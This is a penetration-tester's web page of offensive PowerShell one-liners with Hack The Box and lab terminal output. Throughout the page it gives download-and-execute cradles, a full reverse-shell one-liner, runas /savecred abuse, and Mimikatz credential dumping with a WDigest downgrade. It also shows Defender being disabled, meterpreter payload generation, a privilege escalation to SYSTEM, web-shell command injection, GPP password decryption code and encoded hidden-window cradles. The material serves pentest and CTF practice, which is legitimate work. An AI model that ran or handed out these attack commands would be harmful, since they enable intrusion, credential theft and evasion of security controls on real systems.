puckiestyle – ethical hacking
For info or a quote, mail us at info@puckiestyle.nl or use the contact form
whoami : Network / System Engineer , Security specialist from Meppel (NL)
powershell oneliners
PowerShell (any version):
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.19/shell-443.exe", "C:\FTP\Intranet\shell-443.exe")
PS C:\users\hillie>
(New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")
C:\> PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.178.16:8000/launcher.bat','launcher.bat'); Start-Process 'launcher.bat'
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.178.16',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PS C:\Users\hillie>
IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell443.ps1')
C:\Users\hillie>
cmdkey /list
Currently stored credentials:

    Target: Domain:interactive=HTB\Administrator
    Type: Domain Password
    User: HTB\Administrator
c:\Python37>
python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [28/Feb/2019 19:38:58] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
c:\Users\Public>
certutil -urlcache -split -f http://10.10.14.20/puckieshell443.ps1
PS C:\pentest>
certutil.exe -f -split -VerifyCTL http://192.168.178.12/msbuild_nps.xml
CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)
CertUtil: ASN1 bad tag value met.
The ASN.1 error is expected (the file is not a CTL); the download has still been written to the current directory under its SHA-1 name with a .bin extension, so just rename it:
PS C:\pentest>
dir *.bin
    Directory: C:\pentest

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a----         5/7/2019   4:16 PM       5462 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin

PS C:\pentest>
mv 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin msbuild_nps.xml
PS C:\pentest>
dir *.xml
    Directory: C:\pentest

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a----         5/7/2019   4:16 PM       5462 msbuild_nps.xml
C:\Users\Public>
runas /user:HTB\administrator /savecred "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"
C:\Users\jacco>
nc -lvp 443
listening on [any] 443 ...
10.10.10.xx: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.98] 49167: NO_DATA
Windows PowerShell running as user Administrator on HTB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>
whoami
HTB\administrator
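The cmdkey /list output above is what decides whether runas /savecred will work at all: only a "Domain Password" entry whose target is Domain:interactive=DOMAIN\user is replayed by runas. As an added example (not from the original page), the function below parses that output into objects and flags the entries runas can reuse. The listing at the end is constructed to mirror the one above; the function itself runs cmdkey /list when no text is passed in.

```powershell
# Added example (not from the original page): turn cmdkey /list into objects and
# mark the entries that runas /savecred will replay.
function Get-StoredCredential {
    [CmdletBinding()]
    param(
        # Raw cmdkey output; defaults to running cmdkey /list on this host
        [string[]]$RawOutput = (cmdkey /list)
    )

    $entries = @()
    $current = $null
    foreach ($line in $RawOutput) {
        $line = $line.Trim()
        if ($line -match '^Target:\s*(.+)$') {
            if ($current) { $entries += $current }
            $current = [PSCustomObject]@{ Target = $Matches[1]; Type = $null; User = $null }
        }
        elseif ($current -and $line -match '^Type:\s*(.+)$') { $current.Type = $Matches[1] }
        elseif ($current -and $line -match '^User:\s*(.+)$') { $current.User = $Matches[1] }
    }
    if ($current) { $entries += $current }

    foreach ($e in $entries) {
        # runas /savecred only reuses interactive-logon domain passwords, not generic
        # (browser, git, WinRM) credentials stored in the same vault
        $runasReady = ($e.Type -eq 'Domain Password' -and $e.Target -like 'Domain:interactive=*')
        $e | Add-Member -NotePropertyName RunasSaveCred -NotePropertyValue $runasReady -PassThru
    }
}

# Constructed sample listing (mirrors the cmdkey /list output shown above)
$sample = @'
Currently stored credentials:

    Target: Domain:interactive=HTB\Administrator
    Type: Domain Password
    User: HTB\Administrator

    Target: LegacyGeneric:target=git:https://github.com
    Type: Generic
    User: puck
'@ -split "`r?`n"

Get-StoredCredential -RawOutput $sample | Format-Table -AutoSize

# Anything with RunasSaveCred = True is a candidate for:
#   runas /user:<User> /savecred "powershell <cradle>"
```

On a real host drop the -RawOutput argument; the Generic entries are listed too so you do not waste time trying runas against credentials it will never pick up.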
root@kali:~/htb/access#
echo -n "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA=
c:\Users\Public>
runas /user:ACCESS\administrator /savecred "powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA="
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.178.13/powercat.ps1');powercat -c 192.168.178.13 -p 1234 -e cmd
PowerShell 3.0 and later (Invoke-WebRequest):
PS C:\Users\hillie> Invoke-WebRequest "http://192.168.178.50/shell-443.exe" -OutFile "C:\FTP\intranet\shell-443.exe"
PS C:\Users\hillie>
xp_cmdshell "PowerShell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"
xp_cmdshell "PowerShell IEX(IWR('http://10.10.14.20/puckieshell443.ps1'))"
c:\inetpub\wwwroot\internal-01\log>
powershell
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

Cannot load PSReadline module.  Console is running without PSReadline.
PS C:\inetpub\wwwroot\internal-01\log>
$username = 'BART\h.potter'
PS C:\inetpub\wwwroot\internal-01\log>
$securePassword = ConvertTo-SecureString -AsPlainText -Force 'Password1'
PS C:\inetpub\wwwroot\internal-01\log>
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS C:\inetpub\wwwroot\internal-01\log>
Enter-PSSession -ComputerName localhost -Credential $credential
[localhost]: PS C:\Users\h.potter\Documents> whoami
bart\h.potter
[localhost]: PS C:\Users\h.potter\Documents>
[System.Environment]::Is64BitOperatingSystem
True
[localhost]: PS C:\Users\h.potter\Documents>
[System.Environment]::Is64BitProcess
True
PS C:\users>
IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16:8000/Sherlock.ps1')
Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
PS C:\Users\hillie>
powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerup.ps1');Invoke-AllChecks"
PS C:\Users\hillie>
(new-object net.webclient).downloadfile('http://10.10.14.20/powerup.ps1', 'C:\users\mssql-svc\appdata\local\temp\powerup.ps1')
PS C:\users\mssql-svc\appdata\local\temp>
import-module ./powerup.ps1
[*] Running Invoke-AllChecks
PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/invoke-mimikatz.ps1');Invoke-Mimikatz"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerview.ps1');Get-IPAddress"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/windowsenum.ps1')"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/jaws.ps1')"
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.78.50 -Lport 4444
PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")
d:\PENTEST\impacket-examples-windows-master>psexec puckiestyle.local/administrator@192.168.178.200
PS D:\PENTEST\impacket-examples-windows-master> Connect-PSSession -ComputerName 192.168.178.200 -Credential administrator
C:\WINDOWS\system32>psexec.exe \\192.168.178.200 -u puckiestyle\puck -p p@ssw0rd cmd.exe
wmic /NODE:"DC01" /USER:"puckiestyle\administrator" OS GET Name
wmic /node:192.168.23.214 NIC get description,macaddress
wmic /USER:"puckiestyle\puck" /PASSWORD:"p@ssw0rd" /NODE:192.168.178.200 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt"
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
rundll32.exe user32.dll,LockWorkStation
root@kali#
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o mrshell-p443.exe
root@kali#
msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.20; set lport 443; set ExitOnSession false; exploit -j"
PS C:\WINDOWS\system32>
Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\WINDOWS\system32>
Set-MpPreference -DisableIOAVProtection $true
Change Claire's password to Password1!
Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String 'Password1!' -AsPlainText -Force) -Identity Claire
Log in as Claire and add Tom to Backup_Admins
Powershell Add-ADGroupMember -Identity Backup_Admins -Members tom
Want to add a brand new executable extension (also callable from a .bat)?
C:\Users\jacco>set PATHEXT=%PATHEXT%;.puck
C:\Users\jacco>set pathext
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.puck
Want to know Applocker status from a cmd shell?
powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"
Set TrustedHosts with PowerShell (as Admin)
Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value "Computer1,Computer2"
And check (no Admin needed for that):
Get-Item WSMan:\localhost\Client\TrustedHosts
c:\users\public\
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')
root@kali:~/htb/optimum#
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [09/Apr/2019 10:06:51] "GET /puckieshell53.ps1 HTTP/1.1" 200 -
root@kali:~/htb/optimum#
nc -lvp 53
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 10.10.10.8.
Ncat: Connection from 10.10.10.8:49541.
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>
[System.Environment]::Is64BitOperatingSystem
True
PS C:\Users\kostas\Desktop>
[System.Environment]::Is64BitProcess
True
PS C:\users>
(New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/Invoke-MS16135.ps1", "c:\users\public\Invoke-MS16135.ps1")
PS C:\users\public>
import-module ./Invoke-MS16135.ps1
PS C:\users\public>
Invoke-MS16135 -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell53.ps1')"
[MS16-135 banner]
[by b33f -> @FuzzySec]
[!] Success, spawning a system shell!
root@kali:~/htb#
nc -lvp 53
listening on [any] 53 ...
192.168.178.11: inverse host lookup failed: Unknown host
connect to [192.168.178.16] from (UNKNOWN) [192.168.178.11] 49238
Windows PowerShell running as user hillie on HILLIE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\users\public>
whoami
nt authority\system
PS C:\users\public>
If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:
# Enable Remote Desktop
(Get-WmiObject Win32_TerminalServiceSetting -Namespace root\cimv2\TerminalServices).SetAllowTsConnections(1,1) | Out-Null
(Get-WmiObject -Class "Win32_TSGeneralSetting" -Namespace root\cimv2\TerminalServices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0) | Out-Null
Get-NetFirewallRule -DisplayName "Remote Desktop*" | Set-NetFirewallRule -Enabled True
Execute the above cmdlets as Administrator in PowerShell and RDP should work. Note that SetUserAuthenticationRequired(0) switches Network Level Authentication off; pass 1 instead to keep NLA on when the client supports it.
To test the connection, open Powershell on another machine, and run:
PS C:\Users\jacco>
Test-NetConnection 10.10.10.97 -CommonTCPPort rdp
ComputerName     : 10.10.10.97
RemoteAddress    : 10.10.10.97
RemotePort       : 3389
InterfaceAlias   : Ethernet 2
SourceAddress    : 10.10.14.12
TcpTestSucceeded : True
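The three WMI calls above switch RDP on but also drop Network Level Authentication. As an added example (not from the original page), the same switch-on through CIM with NLA kept unless you explicitly opt out, plus a Get-RdpState read-back of the registry values, firewall rules and listener, so you can confirm the change locally before running Test-NetConnection from the other machine. Namespace, class, method and registry names are the standard Windows ones; the two function names are mine.

```powershell
# Added example (not from the original page): enable RDP via CIM, keep NLA on by
# default, and read back the effective state.
function Enable-Rdp {
    [CmdletBinding()]
    param([switch]$DisableNla)   # legacy-client fallback only; NLA stays on by default

    $ns = 'root/cimv2/TerminalServices'
    $ts = Get-CimInstance -Namespace $ns -ClassName Win32_TerminalServiceSetting
    # Same method the WMI one-liner calls: allow connections and add the firewall exception
    Invoke-CimMethod -InputObject $ts -MethodName SetAllowTSConnections `
        -Arguments @{ AllowTSConnections = [uint32]1; ModifyFirewallException = [uint32]1 } | Out-Null

    $rdpTcp = Get-CimInstance -Namespace $ns -ClassName Win32_TSGeneralSetting -Filter "TerminalName='RDP-Tcp'"
    $nla = if ($DisableNla) { 0 } else { 1 }
    Invoke-CimMethod -InputObject $rdpTcp -MethodName SetUserAuthenticationRequired `
        -Arguments @{ UserAuthenticationRequired = [uint32]$nla } | Out-Null

    Get-NetFirewallRule -DisplayGroup 'Remote Desktop' | Enable-NetFirewallRule
}

function Get-RdpState {
    # Reads the registry values the methods above write, plus firewall rules and the listener
    $ts    = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdp   = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    $rules = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue)
    [PSCustomObject]@{
        ConnectionsAllowed = ($ts.fDenyTSConnections -eq 0)
        NlaRequired        = ($rdp.UserAuthentication -eq 1)
        Port               = $rdp.PortNumber
        FirewallRulesOn    = @($rules | Where-Object { $_.Enabled -eq 'True' }).Count
        Listening          = [bool](Get-NetTCPConnection -State Listen -LocalPort $rdp.PortNumber -ErrorAction SilentlyContinue)
    }
}

# As Administrator:
#   Enable-Rdp               # RDP on, NLA on
#   Enable-Rdp -DisableNla   # only when a client really cannot do NLA
#   Get-RdpState
# Then from another host: Test-NetConnection <target> -CommonTCPPort RDP
```

Get-RdpState is also a quick way to see whether someone else already flipped UserAuthentication to 0 on a box you are looking at.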
PS C:\Users\jacco>
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\PENTEST\secret.txt"))
ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr
PS C:\Users\jacco>
PS C:\pentest>
[IO.File]::WriteAllBytes("c:\pentest\new.txt", [Convert]::FromBase64String("ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr"))
PS C:\pentest> type new.txt
dit bestand is geheim
groetjes Puck
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"
# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"
# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat Hashcat"
# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml   (from cmd.exe)
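findstr only tells you where a cpassword is. As an added example (not from the original page), the block below walks SYSVOL, pulls every cpassword attribute out of the preference XML and decrypts it with the AES-256 key Microsoft published for Group Policy Preferences (zero IV, CBC, PKCS7, UTF-16LE plaintext), which is the same logic Get-GPPPassword uses. Since MS14-025 the GPP editor refuses to store new cpasswords, but old ones stay in SYSVOL until someone removes them. The Groups.xml fragment at the end is constructed, and its cpassword is produced by the inverse helper so the round trip can be checked offline; the function names are mine.

```powershell
# Added example (not from the original page): find and decrypt GPP cpassword values.
# The 32-byte AES key is the one Microsoft documented for Group Policy Preferences.
$GppAesKey = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                      0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppAes {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key     = $GppAesKey
    $aes.IV      = New-Object byte[] 16     # all-zero IV, as the GPP client uses
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes
}

function ConvertFrom-GppPassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # GPP strips the base64 '=' padding; restore it before decoding
    $padded = $Cpassword + ('=' * ((4 - $Cpassword.Length % 4) % 4))
    $cipher = [Convert]::FromBase64String($padded)
    $plain  = (New-GppAes).CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    [System.Text.Encoding]::Unicode.GetString($plain)
}

function ConvertTo-GppPassword {
    # Inverse of the above; used here only to build a constructed test vector
    param([Parameter(Mandatory)][string]$Plain)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Plain)
    $enc   = (New-GppAes).CreateEncryptor().TransformFinalBlock($bytes, 0, $bytes.Length)
    [Convert]::ToBase64String($enc).TrimEnd('=')
}

function Get-GppPasswordFromXml {
    param([Parameter(Mandatory)][xml]$Document, [string]$Source = '<inline>')
    # cpassword always sits on a <Properties> element; the account attribute differs per
    # preference type (Groups: userName, ScheduledTasks: runAs, Services: accountName)
    foreach ($node in $Document.SelectNodes('//Properties[@cpassword]')) {
        $user = @('userName', 'runAs', 'accountName') |
            ForEach-Object { $node.GetAttribute($_) } | Where-Object { $_ } | Select-Object -First 1
        [PSCustomObject]@{
            Source   = $Source
            Account  = $user
            Password = ConvertFrom-GppPassword $node.GetAttribute('cpassword')
        }
    }
}

function Find-GppPassword {
    param([string]$SysvolPath = "\\$env:USERDNSDOMAIN\SYSVOL")
    # Same idea as the findstr one-liners, but parses the XML and decrypts in one pass
    Get-ChildItem -Path $SysvolPath -Recurse -Filter *.xml -ErrorAction SilentlyContinue |
        Select-String -Pattern 'cpassword=' -List |
        ForEach-Object { Get-GppPasswordFromXml -Document ([xml](Get-Content -Raw $_.Path)) -Source $_.Path }
}

# Constructed Groups.xml fragment (not from a real domain); the cpassword is generated
# on the fly so the decrypt path is verifiable offline.
$sampleCpassword = ConvertTo-GppPassword 'Password1!'
$sampleGroupsXml = @"
<Groups>
  <User name="backup_svc" image="2">
    <Properties action="U" userName="backup_svc" cpassword="$sampleCpassword" neverExpires="1" acctDisabled="0"/>
  </User>
</Groups>
"@

Get-GppPasswordFromXml -Document ([xml]$sampleGroupsXml) -Source 'constructed Groups.xml' | Format-Table -AutoSize

# On a domain-joined host:
#   Find-GppPassword | Format-Table -AutoSize
```

Point Find-GppPassword at a specific \\DC\SYSVOL\domain\Policies path if USERDNSDOMAIN is not set (for example from a runas /netonly shell).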
# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Save the cradle to a file named cradle:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/puckiestyle/powershell/refs/heads/master/rev.ps1')
then encode it as UTF-16LE base64:
cat cradle | iconv -t utf-16le | base64 -w0; echo
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcAB1AGMAawBpAGUAcwB0AHkAbABlAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAcwB0AGUAcgAvAHIAZQB2AC4AcABzADEAJwApAAoACgA=
then
http://10.10.11.17/data/modules/shell.php?cmd=powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcAB1AGMAawBpAGUAcwB0AHkAbABlAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAcwB0AGUAcgAvAHIAZQB2AC4AcABzADEAJwApAAoACgA=
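Both cradle encodings on this page (the echo -n | iconv | base64 pipeline for the ACCESS runas, and the cat cradle | iconv variant just above) produce what -EncodedCommand expects: base64 of the UTF-16LE bytes of the script text, no BOM. As an added example (not from the original page), the same encoding done in PowerShell itself, with a round-trip decode so you can check a blob before pasting it into runas, xp_cmdshell or a web shell. The cradle URL is the one from this page; the function names are mine. One thing the round trip makes visible: cat keeps the file's trailing newlines while echo -n does not, which is why the blob above ends in AAoACgA= (two UTF-16LE line feeds after the closing parenthesis). PowerShell runs it anyway, but it is a tell if you are comparing blobs.

```powershell
# Added example (not from the original page): build and verify a -EncodedCommand
# payload without leaving PowerShell. The argument is base64 of the UTF-16LE bytes
# of the script text, no BOM.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Encoded)
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
}

$cradle = "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')"
$enc = ConvertTo-EncodedCommand $cradle

# Round trip before pasting it anywhere; a copy/paste slip shows up here, not on the target
if ((ConvertFrom-EncodedCommand $enc) -ne $cradle) { throw 'encoded payload does not round-trip' }
"powershell -NoP -W Hidden -EncodedCommand $enc"

# What 'cat cradle | iconv' produces when the file ends in newlines: the decoded text
# carries them too, so EndsWith("`n") is how you spot a blob built from a file
$fromFile = ConvertTo-EncodedCommand ($cradle + "`n`n")
(ConvertFrom-EncodedCommand $fromFile).EndsWith("`n")

# Decoding is also the first thing to do with any -enc / -EncodedCommand blob found in
# process-creation or PowerShell logs on the blue side:
ConvertFrom-EncodedCommand $enc
```

The same ConvertFrom-EncodedCommand call works on the blobs from runas, xp_cmdshell and the shell.php URL above, so you can confirm what a stored one-liner does before reusing it.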
(c)2024